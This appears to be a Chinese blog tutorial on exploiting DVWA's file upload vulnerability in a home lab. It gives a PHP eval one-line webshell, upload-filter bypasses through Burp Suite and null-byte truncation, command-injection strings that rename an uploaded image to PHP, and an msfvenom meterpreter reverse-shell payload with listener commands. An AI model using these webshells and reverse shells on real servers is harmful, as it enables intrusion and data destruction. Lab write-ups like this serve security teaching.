dvwa中的文件上传漏洞
环境:
Metasploitable2: 192.168.11.157 dvwa版本:Version 1.0.7 (Release date: 08/09/10)
kail机器:192.168.11.156
一、什么是文件上传漏洞?
文件上传(File Upload)是大部分Web应用都具备的功能,例如用户上传附件、修改头像、分享图片/视频等。正常的文件一般是文档、图片、视频等,Web应用收集之后放入后台存储,需要的时候再调用出来返回;
如果恶意文件如PHP、ASP等执行文件绕过Web应用,并顺利执行,则相当于黑客直接拿到了Webshell,则可以拿到Web应用的数据,删除Web文件,本地提权,进一步拿下整个服务器甚至内网;
上传漏洞原理图:
文件上传漏洞,通常是由于对上传文件的类型、内容没进行严格的审查、过滤,使得攻击者可以通过上传木马获取服务器的webshell权限。
入侵条件:
木马上传成功
知道木马的路径
木马能够正常运行
二、演示dvwa上的文件上传漏洞
2.1、编辑一句话木马
pass.php文件添加
<?php @eval($_POST['pass']);?>@表示后面即使执行错误,也不报错。
eval()函数表示括号内的语句字符串什么的全都当做代码执行。
$_POST['pass']表示从页面中获得pass这个参数值。
2.2、低安全模式
low级别未对上传的文件进行任何验证,可以上传任意类型的文件
尝试上传木马文件php文件,成功:
直接打开木马文件http://192.168.11.157/dvwa/hackable/uploads/pass.php访问成功,但没有显示任何内容(因为是php文件)
通过中国蚁剑连接工具(或者中国菜刀)将url添加进去,密码为pass:
打开文件管理,进入后台成功:
2.3、中安全模式
限制文件类型image/jpeg和大小不能超过100000B(约为97.6KB)
2.3.1、可以利用burpsuite绕过
上传木马文件pass.php,更改文件类型为image/jpeg
攻击后发现上传成功:
2.3.2、00截断
将木马文件pass.php改名为pass.php.jpeg,上传pass.php.jpeg,同时开启burpsuite捕获
切换到Hex进制,将pass.php.jpeg截断为pass.php:
点击“forward”, 也可将pass.php成功上传:
2.4、高安全模式
文件后缀限制与大小限制
下面介绍几种绕过的方法。
2.4.1、将木马隐藏在图片中绕过(High文件上传+Low命令注入)
1、将木马文件pass.php与图片文件test.jpg合并为php.jpg
windows上(关闭实时防护)使用copy命令: copy test.jpg/b+pass.php/a php.jpg
linux上:cat pass.php >> test.jpg
可以看到,一句话木马被添加到图片的尾部(记事本查看或者cat php.jpg):
2、将php.jpg文件上传,成功:
3、选择命令注入(Command Execution):
调整dvwa的等级为low,在Command Execution中输入 127.0.0.1|ls ../../hackable/uploads
结果如下:
4、然后通过命令注入方式输入以下命令来进行更改文件后缀
127.0.0.1|mv ../../hackable/uploads/php.jpg ../../hackable/uploads/php.php
再执行127.0.0.1|ls ../../hackable/uploads查看:
5、中国蚁剑查看,指定连接目录http://192.168.11.157/dvwa/hackable/uploads/php.php,参数为cmd,类型为PHP(eval):
2.4.2、用msfvenom生成的php代码的图片木马,图片欺诈头部绕过(High文件上传+Low文件包含)
1、首先用msfvenom生成一个PHP语言的IPG图片木马
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.11.156 lport=3333 >> /root/Desktop/any.jpg2、上传图片木马any.png
3、在kali终端输入msfconsole进入控制台,输入如下指令
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.11.156
set lport 3333
run4、dvwa选择low等级,切换到文件包含File Inclusion
5、在地址栏输入以下的地址并回车
http://192.168.11.157/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/any.jpg
6、msfconsole控制台就有生成一条会话
7、然后我们通过命令查看一下/hackable/uploads这个目录下有什么文件,然后测试随便删除一个文件,看看有没有权限,测试成功
三、参考
DVWA1.9之文件上传漏洞High级多种方法_晚安這個未知的世界的博客-CSDN博客_dvwa文件上传high级别
VMware之kali安装中国蚁剑_小豆饼的博客-CSDN博客_kali安装中国蚁剑
dvwa中的文件上传漏洞相关推荐
- DVWA之PHP文件上传漏洞(File Upload)
文件上传漏洞是指由于服务器对于用户上传部分的控制不严格导致攻击者可以上传一个恶意的可执行的文件到服务器.简单点说,就是用户直接或者通过各种绕过方式将webshell上传到服务器中进而执行利用. 首先保 ...
- 【Web安全】中国蚁剑+DVWA(本地文件上传漏洞Upload)
文章目录 1 中国蚁剑 2 文件上传漏洞(Upload) 2.1 准备hack.php 2.2 从DVWA上传hack.php 3 使用蚁剑来连接获得webshell 1 中国蚁剑 中国蚁剑是一款开源 ...
- 网络安全课第七节 文件上传漏洞的检测与防御
13 文件上传漏洞:种植服务器木马的捷径 上一讲介绍过反序列化漏洞,利用漏洞常可以造成执行代码的严重后果. 从本讲开始将介绍文件上传漏洞,它比反序列化漏洞原理与利用更加简单,但同样可以达到控制服务器的 ...
- web安全之文件上传漏洞攻击与防范方法
一. 文件上传漏洞与WebShell的关系 文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器并执行.这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等.这种攻击方式是最为直接和有效 ...
- wmm的学习日记(文件上传漏洞)
这个星期正式学习了一下文件上传漏洞,虽然之前也有接触过这样的题目,但还是云里雾里的感觉.现在应该可以不靠题解完完全全靠自己的脑子做一些简单的题目啦.接下来就让我浅浅总结一下吧. 目录 文件上传漏洞简介 ...
- web渗透之文件上传漏洞知识总结
一.文件上传漏洞思路: 第一步: 首先看中间件:因为第一步看中间件就是确定是否存在解析漏洞(学习整理几种解析漏洞的对应版本,有些低版本有解析漏洞,有些高版本就没有.)中间件版本确定了,解析漏洞就确定了 ...
- 文件上传漏洞——DVWA练习
前言:文件上传漏洞是很常见的漏洞,也非常有趣,接下来就在DVWA靶场中边学边练. 文件上传漏洞: 文件上传漏洞是指由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限向 ...
- DVWA靶机-文件上传漏洞(File Upload)
DVWA靶机-文件上传漏洞(File Upload) 文件上传漏洞的四个等级,low,medium,high,impossible,今天我们针对于不同的等级进行基于文件上传漏洞的攻击 DVWA靶机-暴 ...
- DVWA的搭建以及文件上传漏洞各个等级测试
文章目录 DVWA的安装环境 下载DVWA DVWA--File Upload Low级别测试 medium级别测试 High级别测试 制作一句话图片木马 DVWA的安装环境 phpstudy 集成了 ...
最新文章
- leetcode-452 用最少数量的箭引爆气球
- DirectX下 Viewing Frustum 的详细实现
- Trilogy公司的笔试题:根据指定规则用最少的步骤将数转为1
- 7-1 数组元素循环右移问题 (20 分)
- 深度学习:识别图片中的电话号码(2)
- 实现页面弹框背景虚化效果
- 什么是Protocol Buffers / protobuf / protobuffer?一种服务器和客户端的消息交互方式
- 容器转换类型,列表,集合,字典推导式
- Ubuntu安装MyEclise16 过程差不多
- 1496.数括号法求广义表深度
- 【小墨mysql】mysql系列之三---事务
- 怎么避开平台多ip检测
- 地铁信号tts是什么服务器,机场地铁公共广播
- 基于相似性网络融合的目标分类研究
- 水电水利建设项目水环境与水生生态保护技术政策
- 口袋理财:“来了就是深圳人?”全国均价最高的房租了解一下
- MySQL的enclosed-by和escaped-by
- CNN原理及模型参数
- win10更改账户/用户名称
- 基于高德SDK实现跑步时轨迹渐变功能